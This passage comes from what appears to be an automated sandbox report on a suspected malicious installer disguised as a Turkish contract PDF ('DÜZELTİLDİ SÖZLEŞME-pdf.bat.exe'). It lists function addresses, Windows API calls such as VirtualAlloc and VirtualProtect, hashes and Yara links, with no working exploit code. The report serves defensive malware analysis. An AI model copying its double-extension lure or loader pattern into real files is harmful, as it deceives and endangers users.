                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                              • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                              • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                              Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FilePointerwsprintf
                              • String ID:
                              • API String ID: 327478801-0
                              • Opcode ID: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                              • Instruction ID: 3ecce12b6213660a705480fd24811c4b14f3d13bc743ad81d22bf59cde18bc7d
                              • Opcode Fuzzy Hash: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                              • Instruction Fuzzy Hash: 8DE06D71904208AFDB01ABA5AA498AEB379EB44344B10483FF101B10C0CA794C119A2D
                              Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: PathSearch
                              • String ID:
                              • API String ID: 2203818243-0
                              • Opcode ID: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                              • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                              • Opcode Fuzzy Hash: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                              • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                              Function 004060C3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                              Download Yara Rule
                              APIs
                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                              • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                              • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                              Function 00406094 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                              Download Yara Rule
                              APIs
                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                              • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                              • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                              Function 701D2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNELBASE(701D505C,00000004,00000040,701D504C), ref: 701D2A9D
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: b48083210cb1b40d5afd8934a92f150acb22fcd98c03c5d73b0b18599a3c90da
                              • Instruction ID: a9bc776fb8084adc9302304a648e6433bad4ed171f8c2c258deddbd7fc30475c
                              • Opcode Fuzzy Hash: b48083210cb1b40d5afd8934a92f150acb22fcd98c03c5d73b0b18599a3c90da
                              • Instruction Fuzzy Hash: 69F0C2B2A02380DFC350CF3A8C6470A3FE0B719309B74856AF288DAA60E3746444DBA1
                              Function 0040638E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Open
                              • String ID:
                              • API String ID: 71445658-0
                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                              • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                              • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                              Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule
                              APIs
                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                              • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                              • Opcode Fuzzy Hash: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                              • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                              Function 004044A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                              Download Yara Rule
                              APIs
                              • SetDlgItemTextW.USER32(?,?,00000000), ref: 004044BA
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: ItemText
                              • String ID:
                              • API String ID: 3367045223-0
                              • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                              • Instruction ID: ae2ead1ac10e0797e36fe1c05e7dcabccdaa2022beaf041c85de5a3ae6598913
                              • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                              • Instruction Fuzzy Hash: C9C08C71008200BFD241BB08CC02F1FB3AAEF90325F00C42EB15CA10D2C63595308A26
                              Function 004044EC Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                              • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                              • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                              • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                              Function 004044D5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                              • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                              • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                              • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                              Function 004034B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                              Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                              Download Yara Rule
                              APIs
                              • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CallbackDispatcherUser
                              • String ID:
                              • API String ID: 2492992576-0
                              • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                              • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                              • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                              • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                              Function 701D2B98 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNELBASE(00000000), ref: 701D2C57
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: e39ecbe5a082fd1ff3740b50b36f592ee1ab70d2952881ca138682286cb1334f
                              • Instruction ID: 69203673b5f9053d669a7e9a8db77b7a9256dcb18d96368758c5f52d8925d9eb
                              • Opcode Fuzzy Hash: e39ecbe5a082fd1ff3740b50b36f592ee1ab70d2952881ca138682286cb1334f
                              • Instruction Fuzzy Hash: B941BF72501204DFDB129FA5DD92B4D3779EB74354F3084AAF415C7B20D678A880CBD1
                              Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 5065bf49ec89ca03d4d81e0e626b625f4b0a8bbe3ca9100aab93803b3529547f
                              • Instruction ID: a775f6773ee6fca20605c15f6de2f930d7ecc582f877687dc3caa15317c5c1fc
                              • Opcode Fuzzy Hash: 5065bf49ec89ca03d4d81e0e626b625f4b0a8bbe3ca9100aab93803b3529547f
                              • Instruction Fuzzy Hash: 8ED05E73A142008BD710EBB8BE854AF73B8EA403193204C3BD102E1191E6788902461C
                              Function 701D12BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalAlloc.KERNELBASE(00000040,?,701D12DB,?,701D137F,00000019,701D11CA,-000000A0), ref: 701D12C5
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: AllocGlobal
                              • String ID:
                              • API String ID: 3761449716-0
                              • Opcode ID: 9b273f71accb1825ef18cb7c9014799f58d75f1fc70b168a6369f96a06f4f888
                              • Instruction ID: 5bd58bf243a99a5803fef594677d8833c72e5fbed1c9ceeab910c01a510bc1a7
                              • Opcode Fuzzy Hash: 9b273f71accb1825ef18cb7c9014799f58d75f1fc70b168a6369f96a06f4f888
                              • Instruction Fuzzy Hash: F1B012726010009FEF009B15DC0AF343354F700300F344050B700C1450C1604800C534

                              Non-executed Functions

                              Function 00404991 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                              • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                              • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                              • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                              • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                              • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe",76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                • Part of subcall function 004067CF: CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
